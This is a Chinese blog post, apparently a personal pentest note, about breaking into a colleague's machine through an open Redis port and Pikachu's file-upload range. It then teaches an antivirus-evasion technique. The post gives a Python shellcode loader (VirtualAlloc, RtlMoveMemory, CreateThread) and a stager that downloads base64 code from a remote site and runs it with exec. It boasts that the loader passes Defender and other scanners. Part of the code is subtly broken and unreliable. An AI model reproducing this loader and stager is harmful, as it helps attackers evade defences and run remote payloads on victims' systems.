首页 > 其他分享 >从开放端口到内网笔记

从开放端口到内网笔记

时间:2023-09-12 11:34:28浏览次数:42  
标签:kernel32 内网 base64 端口 笔记 ctypes windll shellcode payload

起因:同事A扫公司内网,发现某同事,6379端口开放---redis

从开放端口到内网笔记_加载

 看了看80端口也开放,还在玩pikachu

从开放端口到内网笔记_加载_02

经过同意开始我的测试,找到pikachu中的文件上传靶场---上传前端js校验禁掉直接上shell连接

从开放端口到内网笔记_上传_03

随便翻了翻几个盘发现这个C++目录有个1.exe2023年3月16日上传的,看来被已经被搞了好久了,还没发现

从开放端口到内网笔记_加载_04

还是做了简单免杀了还是4/70

从开放端口到内网笔记_上传_05

python制作简单免杀

1.生成payload

从开放端口到内网笔记_加载_06

2.加载payload


import ctypes
#生成的payload
shellcode=b'payload'  
#加载shellcode
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

3.base64加密第二步骤中的代码

从开放端口到内网笔记_redis_07

4.把base64加密后的代码上传到某个站点

利用get请求去访问站点中的那个文件读取文件通过exec加载文件

从开放端口到内网笔记_加载_08

import requests,base64
#请求站点
s=requests.get("https://xx.com/payload.txt").text
#base64解密
sc=base64.b64decode(ok)
exec执行
exec(sc)

5.之前virustotal试过是6/70, Defender,360,火绒静态全过

缺点:pyinstaller, py2exe两个打包器经过测试,随便写点东西打包,在virustotal中都报毒,还有就是打包后的文件体积较大

内网渗透

接下来就是各种信息收集提权,写面杀的原因就是他安装了Defender

从开放端口到内网笔记_redis_09

搞的起劲过弄完面杀还没打包发现shell被删了,但是redis还可连接。通过redis-cli.exe写shell,连接成功

从开放端口到内网笔记_内网_10

接下来就是上免杀马,后续操作....

标签:kernel32,内网,base64,端口,笔记,ctypes,windll,shellcode,payload
From: https://blog.51cto.com/u_14881360/7443844

相关文章

  • RK3568开发笔记(八):开发板烧写buildroot固件(支持hdmi屏),搭建Qt交叉编译开发环境,编译一个D
    前言  前面发现开发板用ubuntu固件发现空间不够,本篇使用buildroot固件,来实现目标板运行qt界面应用。<br>烧写buildroot固件  这部分更详细的参照《RK3568开发笔记(六):开发板烧写ubuntu固件(支持mipi屏)》的步骤,本质上烧写都是一样的,只是不同的update.img。步骤一:下载镜像  ......
  • RK3568开发笔记(八):开发板烧写buildroot固件(支持hdmi屏),搭建Qt交叉编译开发环境,编译一个D
    前言  前面发现开发板用ubuntu固件发现空间不够,本篇使用buildroot固件,来实现目标板运行qt界面应用。 烧写buildroot固件  这部分更详细的参照《RK3568开发笔记(六):开发板烧写ubuntu固件(支持mipi屏)》的步骤,本质上烧写都是一样的,只是不同的update.img。步骤一:下载......
  • linux(centos7)安装防火墙firewalld及开放端口相关命令
    安装firewalld防火墙命令:yuminstallfirewalld  安装完成,查看防火墙状态为notrunning,即未运行,输入命令开启:  添加开放端口:   防火墙相关命令: 查看防火墙状态systemctlstatusfirewalld.service 打开防火墙systemctlstartfirewalld.service 关闭......
  • win2003系统system占用80端口的解决办法
    本人一直都是用APMServ在winxp中搭建本地服务器测试网站,但最近换了win2003系统,结果本来在XP正常使用的APMServ启动时死活都提示80端口被占用,换成8080端口,虽然提示服务启动了,但是本地网站却打不开,在cmd中用命令查找时,发现提示system占用了80端口。如何查看端口在win03的cmd命令窗口......
  • win7系统如何在防火墙里开放端口
    依次点击“开始”—“控制面板”—“windows防火墙”步骤阅读2先点击“打开或关闭windows防火墙”将windows防火墙打开步骤阅读步骤阅读3点击“高级设置”步骤阅读4设置入站规则(入站规则:别人电脑访问自己电脑;出站规则:自......
  • 80端口被system 占用解决方法
    今天启动Apache的时候老是提示失败,很简单,使用netstat-ano发现80端口被占用。如图所示: 按照PID来说:在任务管理器中查看PID的进程名 既然是system。那么应该不回是真正的系统。而是微软的其他系列产品的进程在运行。【注意:我已经在服务services.msc中结束了IISADmin服务......
  • 新人笔记-权限修饰符与导包
    packagecom_black.daobao.A1;publicclassTeacher{publicvoidteach(){System.out.println("goodstudy,daydayup");}}packagecom_black.daobao.A2;importcom_black.daobao.A1.Teacher;publicclassDemo{publicstati......
  • 云服务器与内网穿透有什么区别?哪个好用?
    云服务器与内网穿透有什么区别,哪个好用?如何在自己公网IP云主机上部署搭建P2P穿透?这里给大家汇总介绍一下,供大家共同学习了解。云服务器的一些特点:需要数据上云场景时,通常可以选择使用云服务器。1.数据上云。比如网站服务的,网站程序文件和数据库等都是部署在云端,本地不存在数据,或定......
  • 如何实现自己在家搭建全端口P2P穿透?快解析内网穿透
    对于有公网主机,有一定的操作能力,需要独立资源配置使用的,可以选择自行搭建内网映射服务。那么如何实现自己搭建全端口P2P穿透呢?下面为大家提供了不同场景下的不同方法,供大家使用时参考。SSH是一种安全的远程登录协议,可以通过SSH实现内网穿透。以下是关于如何使用SSH实现内网穿透的详......
  • CS224W学习笔记
    目录CS224W学习笔记colab1colab2CS224W学习笔记colab1torch.ones全1torch.zeros全0torch.rand0-1随机x.shapeshapex.dtype数据类型zeros=torch.zeros(3,4,dtype=torch.float32)使用数据类型zeros=zeros.type(torch.long)改变数据类型使用torch进行梯度下降:......